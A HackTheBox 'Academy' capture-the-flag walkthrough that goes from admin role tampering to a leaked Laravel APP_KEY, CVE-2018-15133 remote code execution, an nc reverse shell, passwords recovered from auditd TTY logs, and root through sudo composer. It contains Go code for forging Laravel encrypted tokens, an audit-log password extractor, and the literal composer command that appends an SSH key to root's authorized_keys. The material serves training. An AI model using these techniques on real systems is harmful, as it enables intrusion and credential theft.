Academy

Academy from HackTheBox is a relatively easy and straightforward machine. It starts with two open ports, SSH on 22 and HTTP on 80. On the web app we abuse the registration flow to obtain an admin account, which points us at a development subdomain that leaks plenty of information, including the Laravel APP_KEY. That key gives us a shell on the box. From there we find several users and credentials lying around and pivot between accounts until we reach mrb3n, who can run composer with sudo, which gives us root. So let's start!

Summary

Recon

Nmap

A full TCP Nmap scan shows two open ports.

[image: nmap full TCP scan]
A targeted Nmap scan with default scripts and version enumeration against ports 22 and 80 follows; from the Apache version string we can guess the host is running Ubuntu Focal Fossa.
[image: nmap targeted scan]
Add academy.htb (revealed in the Nmap scan output) to /etc/hosts.
[image: adding academy.htb to /etc/hosts]

The page source reveals nothing useful, so let's check the links on the page.

[image: main page on port 80]

Gobuster

Fuzzing directories gives a few hits: admin.php and config.php.

[image: fuzzing academy.htb with gobuster]
Let's look at the application from a user's point of view by creating an account.
[image: registration page]
Something looks odd: I registered with the username rekkodo but got logged in as egre55. Time for Burp Suite.
[image: logged in as egre55]

Burpsuite

Looking at the registration POST request in Burp Suite, we notice a roleid=0 parameter. A reasonable guess is that it decides whether the new user is a regular or an admin account, and since the server trusts whatever value the client sends, we change it to 1 and resend the request.

[image: Burp Suite registration POST request]
We then log in with the newly created account rek (which now has roleid=1), but through the admin.php page instead of the normal login.
[image: admin login page]
We are in the backend and see the Academy Launch Planner. One of its items mentions fixing an issue on the subdomain dev-staging-01.academy.htb.
[image: logged in to admin area]
Let's add dev-staging-01.academy.htb to /etc/hosts.
[image: adding dev-staging-01.academy.htb to /etc/hosts]
Browsing to the newly discovered subdomain lands on a page that leaks tons of information: the framework in use (Laravel), the APP_KEY, the database system (MySQL) and a username and password for a database called homestead.
[image: navigating to dev-staging-01.academy.htb]
We put everything found so far into CherryTree to stay organized.
[image: CherryTree]
A little Googling turns up a CVE that fits: CVE-2018-15133, a deserialization RCE in Laravel that needs nothing more than the APP_KEY we just leaked. Vulnerable versions decrypt and then unserialize the X-XSRF-TOKEN value, and anyone holding APP_KEY can forge a token that decrypts to a malicious serialized object.
[image: GitHub repo of CVE-2018-15133]
Clone the repo to the local machine.
[image: cloning the repo to local machine]
After reading the Python script we run it with the APP_KEY found earlier, using id as the command. We get output back: RCE works!
[image: getting RCE on the box]
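The Python script does the work for us, but it is worth understanding the primitive it relies on, because it is the whole reason a leaked APP_KEY is game over. The Go program below is an added example, not code from the page or from the exploit repo: it reproduces Laravel's Encrypter token format (AES-CBC ciphertext plus an HMAC-SHA256 over the base64 iv and base64 ciphertext, wrapped in base64-encoded JSON with iv, value and mac fields) and then does what the server does on receipt, MAC check first, decrypt second. The APP_KEY in it is a placeholder of 32 'A' bytes, not the key leaked on the box, and the plaintext is a harmless serialized PHP string standing in for the gadget chain a real exploit would encrypt.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

var b64 = base64.StdEncoding

// laravelPayload mirrors the JSON document that Laravel's Encrypter base64-encodes into a token.
type laravelPayload struct {
	IV    string `json:"iv"`
	Value string `json:"value"`
	MAC   string `json:"mac"`
}

// cipherFromAppKey strips the "base64:" prefix .env uses and builds the AES block cipher.
func cipherFromAppKey(appKey string) ([]byte, cipher.Block, error) {
	key, err := b64.DecodeString(strings.TrimPrefix(appKey, "base64:"))
	if err != nil {
		return nil, nil, err
	}
	block, err := aes.NewCipher(key) // rejects anything but a 16/24/32-byte key (Laravel uses 16 or 32)
	return key, block, err
}

// laravelMAC reproduces hash_hmac('sha256', base64(iv) . base64(ciphertext), key).
func laravelMAC(key []byte, ivB64, valueB64 string) []byte {
	h := hmac.New(sha256.New, key)
	h.Write([]byte(ivB64 + valueB64))
	return h.Sum(nil)
}

// LaravelEncrypt builds a token in Laravel's encrypted-payload format for any plaintext,
// which is all an attacker holding APP_KEY needs to forge an X-XSRF-TOKEN the app trusts.
func LaravelEncrypt(appKey string, plaintext []byte) (string, error) {
	key, block, err := cipherFromAppKey(appKey)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plaintext)%aes.BlockSize // PKCS#7 padding, as openssl_encrypt does
	buf := append(append([]byte(nil), plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(buf, buf) // encrypt in place
	p := laravelPayload{IV: b64.EncodeToString(iv), Value: b64.EncodeToString(buf)}
	p.MAC = hex.EncodeToString(laravelMAC(key, p.IV, p.Value))
	j, _ := json.Marshal(p)
	return b64.EncodeToString(j), nil
}

// LaravelDecrypt does what the server does on receipt: verify the MAC, then AES-CBC decrypt.
// The bytes it returns are exactly what vulnerable Laravel versions hand to unserialize().
func LaravelDecrypt(appKey, token string) ([]byte, error) {
	key, block, err := cipherFromAppKey(appKey)
	if err != nil {
		return nil, err
	}
	var p laravelPayload
	if j, err := b64.DecodeString(token); err != nil {
		return nil, err
	} else if err := json.Unmarshal(j, &p); err != nil {
		return nil, err
	}
	// Constant-time MAC check, like Laravel's validMac(): without APP_KEY a forged token dies here.
	want, _ := hex.DecodeString(p.MAC)
	if !hmac.Equal(want, laravelMAC(key, p.IV, p.Value)) {
		return nil, errors.New("MAC is invalid")
	}
	iv, err1 := b64.DecodeString(p.IV)
	ct, err2 := b64.DecodeString(p.Value)
	if err1 != nil || err2 != nil || len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("bad iv or ciphertext encoding")
	}
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(ct, ct) // decrypt in place
	n := int(ct[len(ct)-1])                               // strip and validate the PKCS#7 padding
	if n == 0 || n > aes.BlockSize || !bytes.Equal(ct[len(ct)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return ct[:len(ct)-n], nil
}

func main() {
	appKey := "base64:" + b64.EncodeToString(bytes.Repeat([]byte{'A'}, 32)) // placeholder, not the box's key
	token, _ := LaravelEncrypt(appKey, []byte(`s:4:"test";`))               // real exploit: a PHP gadget chain
	pt, err := LaravelDecrypt(appKey, token)
	fmt.Printf("forged token: %s\nserver would unserialize: %q err=%v\n", token, pt, err)
}
```

A token forged under the key round-trips, and the same token is rejected under any other key, which is the whole story of this CVE: the MAC that is supposed to keep untrusted data out of unserialize() is only as secret as APP_KEY, and the dev subdomain handed that key to us.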

User shell

We start an nc listener on port 9000 and run the Python script again with a reverse-shell payload pointed at us; the connection comes back.

[image: initial shell]
As soon as we have a shell we spot the interesting .env file and, as suspected, it contains credentials.
[image: cat .env file]
Checking /home and /etc/passwd shows several users, so we try the found credentials over SSH against each of them; they work for cry0l1t3.
[image: ssh login as cry0l1t3]
Looking around the system we find juicy files in /var/log/audit; audit.log yields more credentials, which we use to switch to mrb3n.
[image: changing user to mrb3n]
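The writeup does not show the exact audit.log lines, so the Go program below is an added example rather than the page's own tooling. It assumes the credentials sit in auditd TTY records (type=TTY ... comm="..." data=<hex>), which is the form in which auditd's TTY keystroke logging stores what a user typed: the data field is hex-encoded and whatever was typed into su, sudo or similar is the password. The sample log lines in the program are constructed for the example with a placeholder password and are not copied from the box.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// TTYRecord is one decoded auditd TTY keystroke record.
type TTYRecord struct {
	Serial string // audit event serial, handy for ordering and for jumping back into the raw log
	Comm   string // the program that was reading the terminal when the keys were typed
	Data   string // decoded keystrokes, with the trailing carriage return removed
}

// sampleAuditLog is constructed for this example in auditd's record format; it is not a copy
// of the box's audit.log, and "secret" is a placeholder password.
const sampleAuditLog = `type=LOGIN msg=audit(1606000000.100:120): pid=1200 uid=0 old-auid=4294967295 auid=1002 tty=(none) old-ses=4294967295 ses=1 res=1
type=TTY msg=audit(1606000000.200:121): tty pid=1201 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="bash" data=7375206D7262336E0D
type=TTY msg=audit(1606000000.300:122): tty pid=1202 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="su" data=7365637265740D
type=TTY msg=audit(1606000000.400:123): tty pid=1203 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="bash" data=69640D
`

// ttyRe matches only TTY records and captures the serial, the reading program and the hex keystrokes.
var ttyRe = regexp.MustCompile(`^type=TTY msg=audit\([0-9.]+:([0-9]+)\):.* comm="([^"]*)" data=([0-9A-Fa-f]+)`)

// ParseTTYRecords walks an audit log and decodes every TTY record it finds.
func ParseTTYRecords(log string) ([]TTYRecord, error) {
	var recs []TTYRecord
	for _, line := range strings.Split(log, "\n") {
		m := ttyRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		raw, err := hex.DecodeString(m[3])
		if err != nil {
			return nil, fmt.Errorf("serial %s: bad hex in data field: %w", m[1], err)
		}
		recs = append(recs, TTYRecord{Serial: m[1], Comm: m[2], Data: strings.TrimRight(string(raw), "\r\n")})
	}
	return recs, nil
}

// passwordReaders are programs that read a password from the terminal; keystrokes delivered
// to them are the prime credential candidates.
var passwordReaders = map[string]bool{"su": true, "sudo": true, "passwd": true, "ssh": true, "mysql": true}

// PasswordCandidates keeps the records whose keystrokes went to a password prompt.
func PasswordCandidates(recs []TTYRecord) []TTYRecord {
	var out []TTYRecord
	for _, r := range recs {
		if passwordReaders[r.Comm] && r.Data != "" {
			out = append(out, r)
		}
	}
	return out
}

func main() {
	recs, err := ParseTTYRecords(sampleAuditLog)
	if err != nil {
		panic(err)
	}
	for _, r := range recs {
		fmt.Printf("%s %-6s %q\n", r.Serial, r.Comm, r.Data)
	}
	for _, c := range PasswordCandidates(recs) {
		fmt.Printf("candidate password typed into %s: %q\n", c.Comm, c.Data)
	}
}
```

Reading the records in serial order tells the story: the shell receives "su mrb3n", then su receives the next line typed, which is the password. On a real log, pipe the whole file in and review the candidates rather than trusting the comm filter blindly, since a password typed a second too early lands in bash instead of su.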

Root shell

Logged in as mrb3n, sudo -l shows that this user can run composer with sudo.

[image: sudo -l as mrb3n]

mrb3n@academy:~$ TF=$(mktemp -d)            # scratch directory for a throwaway composer project
mrb3n@academy:~$ nano $TF/composer.json     # any script defined here runs with composer's privileges, i.e. root under sudo
{"scripts":{"rekkodo":"echo ' public key ' >> /root/.ssh/authorized_keys"}}
mrb3n@academy:~$ sudo /usr/bin/composer --working-dir=$TF run-script rekkodo

From our attacking machine we use the matching private key to log in as root.

yami@sama:~$ ssh -i .ssh/id-rsa root@academy.htb
[image: logging in to the Academy box as root]